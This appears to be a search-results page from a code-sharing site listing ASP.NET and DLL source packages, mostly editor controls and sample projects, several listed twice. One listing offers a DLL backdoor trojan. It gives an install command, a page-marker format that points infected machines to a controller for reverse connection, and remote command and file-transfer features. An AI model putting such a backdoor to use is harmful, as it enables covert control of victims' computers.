Welcome![Sign In][Sign Up]
Location:
Search - aspx dll

Search list

[Internet-Network将.aspx文件和图片编译进dll

Description: 简单学习asp.net将文件和图片编译成动态外链接库..对一些初学者.是一个不错的例子. 其它的详细说明看代码哦-simple study of documents and pictures compiled into a dynamic link library .. outside for some beginners. It is a good example. Other detailed look at the code oh
Platform: | Size: 7297 | Author: 辉辉 | Hits:

[WinSock-NDISDXTB10

Description: DXTB 多功能编辑器 使用说明: 1.将 DXControls.dll 文件放于空间根目录的bin文件夹里. 2.在需要用编辑器的ASPX页面代码头部加入 3.在需要显示编辑器的位置插入代码: 4.其中 id 为编辑器的ID,Path为编辑器所需资源(如JS)所在的文件夹,Height为编辑器高度,Width为编辑器宽度-DXTB multifunctional editors use : 1. DXControls.dll document will be put in the root directory space bin folder. 2. The need for the editorial pages ASPX code by adding three to his head. The editors need to show the location of inserting code : 4. Id which to the Editor ID, Path to editors resource requirements (such as JS) The host of folders, Height editor for height, editor of Width Width
Platform: | Size: 63752 | Author: 杜飞 | Hits:

[Browser Client0691

Description: dotnetadsql 原来的程序缺少了部分数据库及部分代码,小宝.NET已经自行补全了一些核心 代码,已经调试通过了,具体安装过程如下: 1.启动SQL,新建一名为ad的数据库并导入ad.sql及user.sql生成ad及net_user 两个数据表格,然后在net_user表格中增加一管理员记录,user_id字段为:adm in,password字段及e_mail字段自己喜欢填什么就填什么。 2.修改linkstr.cs文件里的SQL2000数据库连接字符为你数据库的连接字符,然 后使用CSC编译linkstr.cs文件,假设你的linkstr.cs放在D盘根目录,操作系统 安装在C:/winnt/目录下的话,就在运行栏下输入并运行以下命令: C:\\WINNT\\Microsoft.NET\\Framework\\v1.0.3705\\csc /t:library d:\\linkstr.cs 这样则会在C:\\WINNT\\Microsoft.NET\\Framework\\v1.0.3705\\目录下生成一个名 为linkstr.dll的组件,把这个DLL组件覆盖广告管理系统bin目录下同名文件即可 3.设置ad目录为虚拟目录,然后浏览运行login.aspx文件,填入刚才在SQL设置的 管理员名称及密码即可登录进管理系统增加广告-dotnetadsql original lack of procedures and some part of the database code, Xiaobao.NET has its own complement of some of the core code, debugging has been adopted, the specific installation process is as follows : 1. start SQL, an ad for the new database and import ad.sql and user.sql generation ad and net_us er two data tables, and then increase net_user form a caretaker records, user_id field : adm in, password field and the Lord filled the field what he likes on what filled. 2. Changes linkstr.cs documents in the SQL2000 database connectivity for your characters database connectivity characters and then use the compiler linkstr.cs CSC, Suppose your linkstr.cs on D NOTE, the operating system installed on the C : / winnt / directory, then run under the column of input and run the follow
Platform: | Size: 37154 | Author: 大军 | Hits:

[OS programSELONGS

Description: 平台+插件软件设计思想及基于COM的原型实现 http://www.iteer.net/modules/news/article.php?storyid=4 由云台协议DLL浅谈插件程序的编写 http://blog.csdn.net/waterpub/archive/2004/12/25/228920.aspx http://blog.csdn.net/waterpub/archive/2004/12/25/228925.aspx C++资源之不完全导引 http://blog.csdn.net/waterpub/archive/2004/12/21/224013.aspx -platform plug-in software design and COM-based Prototype Implementation http : / / www.iteer.net / modules / news / article.php storyid = 4 by the DLL platforms agreement on procedures for the preparation of plug - http : / / blog.csdn.net/waterpub/archive/2004/12 / 25/228920.aspx http : / / blog.csdn.net/waterpub/archive/2004/12 / C 25/228925.aspx resources not fully guided http : / / blog.csdn.net/waterpub/archive/2004/12 / 21/224013.aspx
Platform: | Size: 338771 | Author: 程序 | Hits:

[WEB CodeFTB_1.6.3_zh

Description: .net控件FreeTextBox使用方法 1.先把freetextbox.dll添加到项目中 2.把-ftb.colorpicker.aspx -ftb.imagegallery.aspx -ftb.inserttable.aspx 从文件夹HelperScripts复制出来,放到外面与-test.aspx(测试)同等级目录, (不这么做,插入背景色,图片,表格就不好使) 3.把images文件夹放到test.aspx(测试)同等级目录下,来存放上传的图片. 4.在test.aspx中,加图片的路径 this.FreeTextBox1.Text这个就是FTB中你输入的文本的内容,这是带HTML标记的 this.FreeTextBox1.HtmlStrippedText这个是将HTML标记去掉的文本 5.写入数据库 在CSDN上看到朋友们说怎么把FreeTextBox内容写入数据库中 我做了一下.就是把所有产生的HTML代码都插入数据库的一个字段中
Platform: | Size: 315219 | Author: zsw119 | Hits:

[EditBoxDXTB

Description: 1.将 DXControls.dll 文件放于空间根目录的bin文件夹里. 2.在需要用编辑器的ASPX页面代码头部加入 <%@ Register TagPrefix=\"DXControls\" Namespace=\"DXControls\" Assembly=\"DXControls\" %> 3.在需要显示编辑器的位置插入代码:<DXControls:DXTB id=\"dansin\" Path=\"editor\" Height=\"296px\" Width=\"600px\" runat=\"server\" /> 4.其中 id 为编辑器的ID,Path为编辑器所需资源(如JS)所在的文件夹,Height为编辑器高度,Width为编辑器宽度. 控件演试地址:http://www.dxbbs.cn/dxtb/test.aspx 下载地址:http://www.dxbbs.cn/dxtb/dxtb.rar-1. DXControls.dll document will be put in the root directory space bin folder. 2 . the need for the editorial pages ASPX code joined head
Platform: | Size: 63767 | Author: aa | Hits:

[Graph programVistaColck

Description: 最新版的Vista界面精美时钟控件源代码,新增时钟滴答声,是否显示秒针,徽标位置,时区偏移等功能。支持达8款时钟皮肤界面以及支持用户自定义皮肤,皮肤包括流行操作系统时钟界面,如Vista,longhorn等,界面支持背景图片,自定义显示时针,分针,秒针已经徽标和高亮光特效,支持透明度选择,指定显示位置等。皮肤可以自己使用PNG格式制作。使用GDI Plus编程,系统没有安装GDI支持dll的,可以到微软网站:http://www.microsoft.com/downloads/details.aspx?FamilyID=6a63ab9c-df12-4d41-933c-be590feaa05a&DisplayLang=en下载。-latest version of the Vista interface exquisite clock controls the source code, a new clock tick, whether the hands of, logo location, time zone offset, and other functions. 8, supporting the clock skin interface and support for user-defined skin, including skin popular operating system clock interface If Vista, longhorn, interface support background pictures, custom show anti-clockwise, watches, hands of already logo and high light effects, in support of transparency option, the designated location, and so on. Their skin can use PNG format. Programming using GDI Plus, the system does not support the installation of GDI dll, can Microsoft website : http : / / www.microsoft.com / downloads / details.as FamilyID = px 6a63ab9c - df12 - 4d41 - 933c - be590 feaa05a
Platform: | Size: 785988 | Author: 刘德华 | Hits:

[CSharp19HeadControlSrc

Description: eadControl适用范围: 如果一个网站的链接形式均为一个独立的文件(如:default.aspx),没有像article.aspx?id=1这种页面,那么可以使用该控件。 HeadControl用户控件使用方法: 假设现在有一个项目叫test,位于E:\\WWWROOT\\TEMP\\test,请按以下步骤使用该用户自定义控件。 1.把压缩包内HeadControl目录的文件拷到项目的目录下(Head.ascx.cs可以不用)。在这里指的是E:\\WWWROOT\\TEMP\\test目录。 注意:如果想改css文件路径,只要将Head.ascx中的 <LINK href=\"style/style.css\" type=\"text/css\" rel=\"stylesheet\"> 改成相应的css地址就行了,如果不懂的话,css中的标记请不要改。 2.打开test项目,在右上角的“引用”处单击右键,选择“添加引用”。在弹出的对话框中选择“浏览”找到bin目录下的HeadControl.dll,点确定。
Platform: | Size: 71276 | Author: sailoren | Hits:

[Other resourceUpload

Description: 计算工厂2经典插件合集 (把编译后的插件DLL文件放入cf1127\\features\\文件夹,双击CalculationFactory.exe,单击“公式/工具箱”下压式按钮,“工具箱”选项卡,即可看到插件工具。剩余的9个文件夹里包含不同的工程,全部都编译成类库,即为计算工厂2插件DLL文件) 详情请见 http://cf.johnbill.cn/cf2/toolbox/zym.aspx
Platform: | Size: 491841 | Author: hias_asia | Hits:

[OtherTDL_Calendar_src

Description: This article is an attempt to describe how I created a Calendar plugin for .dan.g. s ToDoList. It may be useful to you for two reasons: 1. You might simply want to download the DLL and get a useful Calendar view of your tasklist 2. You may want to go that one step further and write your own plugin. If you re here for reason #1 and scared of reason #2, please don t worry. Read on - it s easy! [ref]http://www.codeproject.com/KB/applications/TDL_Calendar.aspx
Platform: | Size: 52229 | Author: dozingcat | Hits:

[Other resourceDotNetTextBox

Description: 一、使用说明: 用VS2005以上版本打开DotNetTextBox.sln即可,其中Word_dntb目录为导入Word文档的源码,DotNetTextBox目录为DotNetTextBox的核心源码,DotNetTextBoxWebSite目录是调用DotNetTextBox控件的实例网站。 二、注意事项: (1)关于EnvDTE.Dll的问题. 如果虚拟主机运行控件没有出现Could not load file or assembly EnvDTE, Version=8.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 的错误,那么实例网站中BIN目录下的EnvDte.dll文件可以删除. (2)BIN目录中其它DLL的使用说明. *ActiproSoftware.CodeHighlighter.Net20.dll、ActiproSoftware.Shared.Net20.dll、CodeHighlighterTest.dll 说明:因为控件使用了第三方的免费代码高亮插件,所以还需要在项目BIN目录下拷贝这些DLL,如果你不需要用到此功能,除了在配置文件中删除相关设置外,同时删除system_dntb目录里的PasteCode.aspx和PasteCode.aspx.cs即可,这样这三个DLL也无需复制!
Platform: | Size: 222157 | Author: borrowheart | Hits:

[Remote Control050615adminchick-backdoor

Description: 注入进程的 超强DLL后门木马 支持系统 2000以上, 功能: 1.支持密码验证 2.cmd命令 3.上传下载 安装: 要用到的程序. install.exe 和 ServerDll.dll 在CMD下 运行 install -h http://www.donews.net/xxx/archive/2004/09/26/110321.aspx -p 1234567 -h 后面接的是一个网页的地址。网页里面包含自己的IP和端口,肉鸡读到后,会进行反弹连接 -p 后面是认证密码 在静态网页中,必须包含 例如 ###HOST:192.168.0.2:8288@@@ 的特征字符串 其中的###和@@@不可少 HOST:后面接控制端的IP。 :后面是控制端的端口号。可以自己修改。可以使用80 或 8080 上传命令: -put <源文件> <目标文件> 上传到肉鸡的WindowsDirectory下,如2000的WINNT xp的WINDOWS 下载命令: -get <源文件> <目标文件> 建议可以去申请一个免费的Blog,修改起来也很方便。 控制端: MC.exe。主要用于动态肉鸡的管理,例如ADSL拨号用户肉鸡的管理。保证肉鸡不丢失-injection process superpower backdoor Trojan DLL support more than 2,000 systems, functions : 1. Support for password verification 2.cmd three orders. Uploading and downloading Installation : use of the procedure. INSTALL.exe ServerDll.dll the CMD and running install-h http:// www.donews.net/xxx/archive/2004/09/26/110321.aspx-p 1234567-h, followed is a website address. The website which contains its own IP and ports, broiler read, the link will rebound-p password authentication is behind the static pages, for example, must contain # # # HOST : @ @ @ 192.168.0.2:8288 features the String # # # @ @ @ essential HOST : control-followed by the IP. : Back of the control side of the port. Changes can own. 80 can be used to upload or 8080 orders :-put lt; Source gt; Lt; The target file gt; Uploaded
Platform: | Size: 110566 | Author: aaaa | Hits:

[ASPX.NETreeTextBox 1.6.3 中文版以及源代码

Description: FreeTextBox 1.6.3 中文版使用说明 1.直接使用的方法: (1) 复制 bin 目录下的 FreeTextBox.dll 文件到你的 Web 应用程序目录中的 bin 目录或其上层的虚拟目录下的 bin 目录; (2) 复制 HelperScripts 目录下的三个文件到你的 Web 应用程序目录中或其子目录中,注意使用时要指定 HelperFilePath 属性; (3) 复制 images 目录下的 ftb 目录到你的 Web 站点根目录下的 images 目录中。 默认的目录结构如下: + Web 根目录 + bin 目录 - FreeTextBox.dll + images 目录 + ftb 目录 + 你的应用程序(虚拟目录) + bin 目录 - FreeTextBox.dll + images 目录(这个是你的“图片库”目录,上传的图片都在此) - ftb.colorpicker.aspx - ftb.imagegallery.aspx - ftb.inserttable.aspx - test.aspx (测试) (注:+ 表示目录,- 表示文件;上面 FreeTextBox.dll 只需要复制一个就行了;) 2.或者你可以更改源代码来简化某些设置。 3.官方网站:http://www.freetextbox.com 中文版: http://www.51aspx.com/CV/M67HNQANDQU37/ 上面网页中都有一些示例程序可以参考。 4.使用本软件请遵照 License Agreement 协议,使用中文版时请不要去掉译者信息。
Platform: | Size: 741798 | Author: yulelele | Hits:

[Internet-Network将.aspx文件和图片编译进dll

Description: 简单学习asp.net将文件和图片编译成动态外链接库..对一些初学者.是一个不错的例子. 其它的详细说明看代码哦-simple study of documents and pictures compiled into a dynamic link library .. outside for some beginners. It is a good example. Other detailed look at the code oh
Platform: | Size: 7168 | Author: 辉辉 | Hits:

[Internet-NetworkDXTB10

Description: DXTB 多功能编辑器 使用说明: 1.将 DXControls.dll 文件放于空间根目录的bin文件夹里. 2.在需要用编辑器的ASPX页面代码头部加入 3.在需要显示编辑器的位置插入代码: 4.其中 id 为编辑器的ID,Path为编辑器所需资源(如JS)所在的文件夹,Height为编辑器高度,Width为编辑器宽度-DXTB multifunctional editors use : 1. DXControls.dll document will be put in the root directory space bin folder. 2. The need for the editorial pages ASPX code by adding three to his head. The editors need to show the location of inserting code : 4. Id which to the Editor ID, Path to editors resource requirements (such as JS) The host of folders, Height editor for height, editor of Width Width
Platform: | Size: 63488 | Author: 杜飞 | Hits:

[Browser Client0691

Description: dotnetadsql 原来的程序缺少了部分数据库及部分代码,小宝.NET已经自行补全了一些核心 代码,已经调试通过了,具体安装过程如下: 1.启动SQL,新建一名为ad的数据库并导入ad.sql及user.sql生成ad及net_user 两个数据表格,然后在net_user表格中增加一管理员记录,user_id字段为:adm in,password字段及e_mail字段自己喜欢填什么就填什么。 2.修改linkstr.cs文件里的SQL2000数据库连接字符为你数据库的连接字符,然 后使用CSC编译linkstr.cs文件,假设你的linkstr.cs放在D盘根目录,操作系统 安装在C:/winnt/目录下的话,就在运行栏下输入并运行以下命令: C:\WINNT\Microsoft.NET\Framework\v1.0.3705\csc /t:library d:\linkstr.cs 这样则会在C:\WINNT\Microsoft.NET\Framework\v1.0.3705\目录下生成一个名 为linkstr.dll的组件,把这个DLL组件覆盖广告管理系统bin目录下同名文件即可 3.设置ad目录为虚拟目录,然后浏览运行login.aspx文件,填入刚才在SQL设置的 管理员名称及密码即可登录进管理系统增加广告-dotnetadsql original lack of procedures and some part of the database code, Xiaobao.NET has its own complement of some of the core code, debugging has been adopted, the specific installation process is as follows : 1. start SQL, an ad for the new database and import ad.sql and user.sql generation ad and net_us er two data tables, and then increase net_user form a caretaker records, user_id field : adm in, password field and the Lord filled the field what he likes on what filled. 2. Changes linkstr.cs documents in the SQL2000 database connectivity for your characters database connectivity characters and then use the compiler linkstr.cs CSC, Suppose your linkstr.cs on D NOTE, the operating system installed on the C :/winnt/directory, then run under the column of input and run the follow
Platform: | Size: 36864 | Author: 大军 | Hits:

[WEB CodeSELONGS

Description: 平台+插件软件设计思想及基于COM的原型实现 http://www.iteer.net/modules/news/article.php?storyid=4 由云台协议DLL浅谈插件程序的编写 http://blog.csdn.net/waterpub/archive/2004/12/25/228920.aspx http://blog.csdn.net/waterpub/archive/2004/12/25/228925.aspx C++资源之不完全导引 http://blog.csdn.net/waterpub/archive/2004/12/21/224013.aspx -platform plug-in software design and COM-based Prototype Implementation http :// www.iteer.net/modules/news/article.php storyid = 4 by the DLL platforms agreement on procedures for the preparation of plug- http :// blog.csdn.net/waterpub/archive/2004/12/25/228920.aspx http :// blog.csdn.net/waterpub/archive/2004/12/C 25/228925.aspx resources not fully guided http :// blog.csdn.net/waterpub/archive/2004/12/21/224013.aspx
Platform: | Size: 338944 | Author: 程序 | Hits:

[WEB CodeFTB_1.6.3_zh

Description: .net控件FreeTextBox使用方法 1.先把freetextbox.dll添加到项目中 2.把-ftb.colorpicker.aspx -ftb.imagegallery.aspx -ftb.inserttable.aspx 从文件夹HelperScripts复制出来,放到外面与-test.aspx(测试)同等级目录, (不这么做,插入背景色,图片,表格就不好使) 3.把images文件夹放到test.aspx(测试)同等级目录下,来存放上传的图片. 4.在test.aspx中,加图片的路径 this.FreeTextBox1.Text这个就是FTB中你输入的文本的内容,这是带HTML标记的 this.FreeTextBox1.HtmlStrippedText这个是将HTML标记去掉的文本 5.写入数据库 在CSDN上看到朋友们说怎么把FreeTextBox内容写入数据库中 我做了一下.就是把所有产生的HTML代码都插入数据库的一个字段中-. net use FreeTextBox control Method 1. freetextbox.dll first added to the project 2. to-ftb.colorpicker.aspx-ftb.imagegallery.aspx-ftb.inserttable.aspx copy from the folder HelperScripts out on the outside and-- test.aspx (test) directory of the same class, (do not do this, insert a background color, pictures, forms not so) 3. the images folder on test.aspx (test) the same class directory, to store upload picture .4. in Test.aspx, add picture this.FreeTextBox1.Text this is the path of FTB you have entered the contents of the text, it is with HTML tags this.FreeTextBox1.HtmlStrippedText this is to remove the HTML tags Text 5. write database CSDN see how my friends said to write the contents of the database FreeTextBox me to do a bit. is all the generated HTML code to insert a database field
Platform: | Size: 315392 | Author: zsw119 | Hits:

[Windows Develop3RADIO

Description: 三层网络收音机源码 可以添加电台或者地址,对三层(BLL、DLL、Model)的使用进行了演示。 没有做前台,后台只做了个大部分功能,数据库操作采用的是DBHelper。 website为网站文件夹,管理地址manage.aspx DB_51aspx下为Sql数据库文件,附加即可 VS2008+SQL2005+CodeSmith生成三层 -Three-tier network of radio stations can be added or the source address, the three-tier (BLL, DLL, Model) demonstrated the use of. Front did not do, only a majority of the background function, the database is used to operate DBHelper. website folder for the site, management manage.aspx DB_51aspx Address for Sql database file, you can attach VS2008+ SQL2005+ CodeSmith to generate three-
Platform: | Size: 1685504 | Author: yemao | Hits:

[.netCompressionModule

Description: .net的GZIP压缩功能,可以压缩动态ASPX文件-. net of GZIP compression
Platform: | Size: 205824 | Author: 积极 | Hits:
« 12 »

CodeBus www.codebus.net